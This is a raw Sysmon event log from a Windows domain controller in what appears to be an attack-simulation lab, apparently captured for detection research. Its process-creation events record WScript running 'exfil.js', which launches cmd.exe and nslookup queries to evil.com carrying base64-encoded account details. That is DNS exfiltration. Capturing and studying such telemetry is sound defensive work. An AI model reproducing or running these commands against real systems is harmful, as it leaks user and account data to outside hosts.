(rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-B245-000000005F02}5776C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmjcjm.tmp 2>&1 10341000x8000000000000000214011Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.598{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B345-000000005F02}7436C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214010Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.598{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B345-000000005F02}7436C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214009Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.595{2E1864BB-18FA-629A-B345-000000005F02}74363388C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-B245-000000005F02}5776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214008Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.577{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B345-000000005F02}7436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214007Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214006Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214005Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214004Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.577{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000214003Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.577{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B245-000000005F02}5776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000214002Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.577{2E1864BB-18E0-629A-6742-000000005F02}39765696C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-B245-000000005F02}5776C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000214001Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.579{2E1864BB-18FA-629A-B245-000000005F02}5776C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A QWNjVHlwZTogNTEy evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlmjcjm.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000214000Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.561{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlkwndd.tmpMD5=14EFE03E0C67AE598772AE00481DF4D7,SHA256=91A875FE4CE713F3E89451B0A4F3D74F67372C5460101AA4ED9323B82D4A430D,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000213999Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.545{2E1864BB-18FA-629A-B045-000000005F02}33083620C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-B145-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213998Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.545{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213997Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.545{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213996Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.545{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213995Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.529{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B145-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213994Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.529{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213993Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.529{2E1864BB-18FA-629A-AF45-000000005F02}47685744C:\Windows\system32\cmd.exe{2E1864BB-18FA-629A-B145-000000005F02}2824C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213992Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.543{2E1864BB-18FA-629A-B145-000000005F02}2824C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18FA-629A-AF45-000000005F02}4768C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkwndd.tmp 2>&1 10341000x8000000000000000213991Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.514{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B045-000000005F02}3308C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213990Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.514{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18FA-629A-B045-000000005F02}3308C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213989Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.514{2E1864BB-18FA-629A-B045-000000005F02}33083620C:\Windows\system32\conhost.exe{2E1864BB-18FA-629A-AF45-000000005F02}4768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213988Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.498{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-B045-000000005F02}3308C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213987Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.496{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213986Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.496{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213985Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.496{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213984Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.495{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000213983Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.495{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18FA-629A-AF45-000000005F02}4768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000213982Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.495{2E1864BB-18E0-629A-6742-000000005F02}39767644C:\Windows\System32\WScript.exe{2E1864BB-18FA-629A-AF45-000000005F02}4768C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000213981Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:46.494{2E1864BB-18FA-629A-AF45-000000005F02}4768C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A VXNlck5hbWU6IEd1ZXN0 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlkwndd.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000213980Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 